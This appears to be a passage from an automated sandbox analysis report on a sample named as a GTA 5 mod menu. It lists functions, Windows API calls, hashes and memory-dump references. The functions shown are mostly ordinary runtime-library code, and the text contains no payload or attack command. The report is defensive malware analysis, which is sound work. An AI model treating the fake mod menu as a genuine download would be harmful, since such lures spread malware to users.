LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,00F96EDA,?,?,-00000008,?,00000000), ref: 00F96505

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 2288934150230d9a235b32c2f2a0eb313b432e62fe6e7bdaf031ab57bf73ef72
Instruction ID: aba5626c8a4cfbe798651a80924da75ee1ac8498f09291949187ad509dc94cd2
Opcode Fuzzy Hash: 2288934150230d9a235b32c2f2a0eb313b432e62fe6e7bdaf031ab57bf73ef72
Instruction Fuzzy Hash: 48F0243640021ABBDF226FA4EC159DE3E66AF487A0F098510FA19A5120CB36D971BB90

Function 00F95677 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00F99A24,?,00000000,?,?,00F996C4,?,00000007,?,?,00F9A00A,?,?), ref: 00F9568D
GetLastError.KERNEL32(?,?,00F99A24,?,00000000,?,?,00F996C4,?,00000007,?,?,00F9A00A,?,?), ref: 00F95698

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 0efe561e4a5ee6775f2cd09ebb7dee3204f89f314662a7e2cacc0ea643ac54eb
Instruction ID: 4c0e54729e22f3322f16f69872d06b6ec465e35197b04708374985aebd42a70a
Opcode Fuzzy Hash: 0efe561e4a5ee6775f2cd09ebb7dee3204f89f314662a7e2cacc0ea643ac54eb
Instruction Fuzzy Hash: 1FE08C36500659ABEF222FE4EC08B997BA8AB01B61F504020F60886460CB388850EB95

Function 00F814C0 Relevance: 1.8, APIs: 1, Instructions: 308
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strlen.LIBCMT ref: 00F8150B

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 8f7c332d185b57f49f5d8f2f66a081a489d6a28c52888f054357f50f50a975a0
Instruction ID: be63d8ebeb5556df636c95843528592b9e2ce8911e3883b9b3c85dafee3f76b1
Opcode Fuzzy Hash: 8f7c332d185b57f49f5d8f2f66a081a489d6a28c52888f054357f50f50a975a0
Instruction Fuzzy Hash: DDD12875604B408FC724EF38C555AAABBE0BF48714F148A1DE8878BB61E739F905EB41

Function 00F977F7 Relevance: 1.6, APIs: 1, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(00000083,?,00000005,00F97678,?), ref: 00F97829

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: c0ff8df530ea908f4e5218e950c0189a0fc0998ace679dfab9569355d742f56b
Instruction ID: 992db4bf2723264f36eacfec941bf270efafaea75f4d0fff6bf01a27c2cdfb58
Opcode Fuzzy Hash: c0ff8df530ea908f4e5218e950c0189a0fc0998ace679dfab9569355d742f56b
Instruction Fuzzy Hash: AE514CB191C358AEEF119A29CC84BE5BBADEB05314F2401E9E499C7142D3359D45EF60

Function 00F88530 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f1e0903b9924b7b3bff3da678a84673d618ba857dff261bab6bac2cbfeb03c2
Instruction ID: 0a08fea234bc47bebbf3a06f537a46345b126f2657677ef04766c2c50f2efb7b
Opcode Fuzzy Hash: 0f1e0903b9924b7b3bff3da678a84673d618ba857dff261bab6bac2cbfeb03c2
Instruction Fuzzy Hash: 4E419372A0011AAFCF14EF68C8909EDB7B9FF08350F940165E541E7640EB31ED46EB90

Function 00F966CD Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dec97a39281c0a2d294626ace38d8c9a19108ee8a9411bb59f28cae7a6a8bfe
Instruction ID: b171aa5d489f69bf7f5a1024dcb7bb92c7e11fb06636c0f30d75d85dd7476616
Opcode Fuzzy Hash: 4dec97a39281c0a2d294626ace38d8c9a19108ee8a9411bb59f28cae7a6a8bfe
Instruction Fuzzy Hash: 5101B533610219ABAF168FA8EC85E5673AAFBC1734B244224F914CB594DE30E810BFD1

Function 00F956B1 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00F97635,?,?,00F97635,00000220,?,?,?), ref: 00F956E3

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8de361e682a6c922f29c3844b56aa229065cb4a9bc4753171a231c621e1c2fcd
Instruction ID: be0a34923ab9e63c7b13737ae06203314e9a72d9d654c4530f61e78e6efcbb3d
Opcode Fuzzy Hash: 8de361e682a6c922f29c3844b56aa229065cb4a9bc4753171a231c621e1c2fcd
Instruction Fuzzy Hash: C3E06531905A2557FF237669DC00B9A7A48AF41FB1F954131EC1596090DB54DC04B7A4

Function 00F820C0 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FreeConsole.KERNELBASE ref: 00F820D1

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: b0b5446b590a0d6b9cc7c7c7bf3d777aa201a85156f451095a5b989726163efc
Instruction ID: 69b82edc4fd8970f3e646fc5317297419a8db73136c8324f01c1f49d24219bd5
Opcode Fuzzy Hash: b0b5446b590a0d6b9cc7c7c7bf3d777aa201a85156f451095a5b989726163efc
Instruction Fuzzy Hash: 3CC0127010010CABD740EF94DC0578D77ECDB04220F004021FC0DC7300DA79EA409652

Non-executed Functions

Function 00FA04C2 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1479COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00FA06D9

Strings

1#QNAN, xrefs: 00FA05D5
1#SNAN, xrefs: 00FA05CE
1#INF, xrefs: 00FA05F8
1#IND, xrefs: 00FA05C7

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 5e106abc945bc25e04b35653f8de1a6470350dda29a8994a36414c69167abd55
Instruction ID: c9fd0c3202ee5147d6c639f6923070c177321bbc7d352857fd25b3e8abe0c706
Opcode Fuzzy Hash: 5e106abc945bc25e04b35653f8de1a6470350dda29a8994a36414c69167abd55
Instruction Fuzzy Hash: C5D25BB2E082288FDB64CE28DD407EAB7B5FB46315F1541EAD40DE7240DB78AE859F41

Function 00F9B177 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00F9AB2D,00000002,00000000,?,?,?,00F9AB2D,?,00000000), ref: 00F9B210
GetLocaleInfoW.KERNEL32(?,20001004,00F9AB2D,00000002,00000000,?,?,?,00F9AB2D,?,00000000), ref: 00F9B239
GetACP.KERNEL32(?,?,00F9AB2D,?,00000000), ref: 00F9B24E

Strings

OCP, xrefs: 00F9B1CB
ACP, xrefs: 00F9B195

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 83ce1b187351f555520f7ed8a2d5b7d489f80fe1e6b4fd7eeec91ccd592a8201
Instruction ID: 9203ef6fc9630091ae59231822bb246e077fe8d5dff5f75cc10b9de42de5c01d
Opcode Fuzzy Hash: 83ce1b187351f555520f7ed8a2d5b7d489f80fe1e6b4fd7eeec91ccd592a8201
Instruction Fuzzy Hash: ED21D622E04100A6FF358F55EA00BAB73A7EF90B30B564424E90AD7104E732DD80F350

Function 00F9A9F7 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00F9AAFF
IsValidCodePage.KERNEL32(00000000), ref: 00F9AB3D
IsValidLocale.KERNEL32(?,00000001), ref: 00F9AB50
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00F9AB98
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00F9ABB3

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: d96bd4a143244115fde5f5f8bdc145e5ecff8f360c565f920c7763ac8d9a33f0
Instruction ID: 87f2566d22180582d4e9b9397b96ef545291b36812a556565798de6efd7a2706
Opcode Fuzzy Hash: d96bd4a143244115fde5f5f8bdc145e5ecff8f360c565f920c7763ac8d9a33f0
Instruction Fuzzy Hash: 755180B2E00219ABFF14DFA4CC85AAA73B9FF44710F144465E911E7190E774DA44EBA2

Function 00F93400 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
Instruction ID: a0f2cbffd4b291ccbac7c0b20493b91d22184ccd65307a441dcd2bc566bb258b
Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
Instruction Fuzzy Hash: C0021DB1E012199BEF14CFA9C9806AEB7F1FF48324F258269E519E7341D731AE41DB90

Function 00F9B759 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F9B849

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 682518063422259e66d24b705a1f9a8d977155a56566af9e99709f28dd45dabf
Instruction ID: f480687b8eecaea44ac7f4016663f439985fa210b6d0a42a61e1c3fc9f68d6b3
Opcode Fuzzy Hash: 682518063422259e66d24b705a1f9a8d977155a56566af9e99709f28dd45dabf
Instruction Fuzzy Hash: F971F3B1D0516C5FEF21AF68ED99AAAB7B8EF45310F5442D9E00893211DB358E84AF10

Function 00F89A33 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00F89A3F
IsDebuggerPresent.KERNEL32 ref: 00F89B0B
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F89B24
UnhandledExceptionFilter.KERNEL32(?), ref: 00F89B2E

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 785eddcaef46b5fc0c8c24b67b55e99e8571f7228d8008e12892e50d5dba098e
Instruction ID: 7e6580cbea56c330b3bf21ad066cd137d0fb22212a913af97cadc37d97eeed3a
Opcode Fuzzy Hash: 785eddcaef46b5fc0c8c24b67b55e99e8571f7228d8008e12892e50d5dba098e
Instruction Fuzzy Hash: E231F9B5D0521D9BDB61EF64DD497CDBBB8AF08300F1041AAE40CAB250E7B49A849F45

Function 00F8A2F5 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00F8A307
GetCurrentThreadId.KERNEL32 ref: 00F8A316
GetCurrentProcessId.KERNEL32 ref: 00F8A31F
QueryPerformanceCounter.KERNEL32(?), ref: 00F8A32C

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: bce81483294894bd674505fa5b2d691fc586897213848fb037e64a0f4125e892
Instruction ID: e5164c47ac02086f04e78d9b9f0eb803f741dcfaa0a18610c6bc353192bee9fa
Opcode Fuzzy Hash: bce81483294894bd674505fa5b2d691fc586897213848fb037e64a0f4125e892
Instruction Fuzzy Hash: 6BF0B2B0C0020CEBCB04DBB4CA4898EBBF4FF1D200B914995E412E7110E734AB44AB50

Function 00F9ACF0 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F9AD44
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F9AD8E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F9AE54

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: e5c0d2a93380a6e1644bc703e79fe24fe7bec716374737b06244a79c2a12ff14
Instruction ID: ca16aacbb87bf9b6a086c7ea6167abbdea428a27d4572ce2a7f10cc94c64ea40
Opcode Fuzzy Hash: e5c0d2a93380a6e1644bc703e79fe24fe7bec716374737b06244a79c2a12ff14
Instruction Fuzzy Hash: 2361B4B19102079FFF28AF29CC82BBA77A8EF04314F104079ED05C6585E778D991EB95

Function 00F91A20 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00F91B18
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F91B22
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00F91B2F

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: be2f22ccdd8266ecaf8efa5e952b18d4d9c76aaab7342eef03999dff88324bbf
Instruction ID: 76df738a4f147c754407c38fc5d53a1665103b50ccefc5d4448f2bf3ffe3ad95
Opcode Fuzzy Hash: be2f22ccdd8266ecaf8efa5e952b18d4d9c76aaab7342eef03999dff88324bbf
Instruction Fuzzy Hash: 0E31D37490121D9BCB21EF24DC887CDBBB8BF48310F5041EAE41CA6291EB749B859F44

Function 00F9EA4E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F9E9A9,?,?,00000008,?,?,00FA535B,00000000), ref: 00F9EC7B

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
